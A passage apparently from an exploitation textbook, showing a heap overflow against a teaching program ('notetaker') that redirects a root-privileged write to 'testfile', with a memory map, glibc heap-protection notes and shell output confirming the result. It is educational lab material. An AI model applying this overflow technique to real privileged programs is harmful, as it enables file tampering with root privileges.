Graphics Programs Reference
In-Depth Information
b7e99000-b7e9a000 rw-p b7e99000 00:00 0
b7e9a000-b7fd5000 r-xp 00000000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd5000-b7fd6000 r--p 0013b000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0
b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0
b7fe7000-b8000000 r-xp 00000000 07:00 15421 /rofs/lib/ld-2.5.so
b8000000-b8002000 rw-p 00019000 07:00 15421 /rofs/lib/ld-2.5.so
bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]
Aborted
reader@hacking:~/booksrc $
This time, the overflow is designed to overwrite the
datafile
buffer with
the string
testfile
. This causes the program to write to testfile instead of
/var/notes, as it was originally programmed to do. However, when the heap
memory is freed by the
free()
command, errors in the heap headers are
detected and the program is terminated. Similar to the return address
overwrite with stack overflows, there are control points within the heap
architecture itself. The most recent version of glibc uses heap memory
management functions that have evolved specifically to counter heap
unlinking attacks. Since version 2.2.5, these functions have been rewritten
to print debugging information and terminate the program when they
detect problems with the heap header information. This makes heap
unlinking in Linux very difficult. However, this particular exploit doesn't
use heap header information to do its magic, so by the time
free()
is called,
the program has already been tricked into writing to a new file with root
privileges.
reader@hacking:~/booksrc $ grep -B10 free notetaker.c
if(write(fd, buffer, strlen(buffer)) == -1) // Write note.
fatal("in main() while writing buffer to file");
write(fd, "\n", 1); // Terminate line.
// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved.\n");
free(buffer);
free(datafile);
reader@hacking:~/booksrc $ ls -l ./testfile
-rw------- 1 root reader 118 2007-09-09 16:19 ./testfile
reader@hacking:~/booksrc $ cat ./testfile
cat: ./testfile: Permission denied
reader@hacking:~/booksrc $ sudo cat ./testfile
?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAtestfile
reader@hacking:~/booksrc $
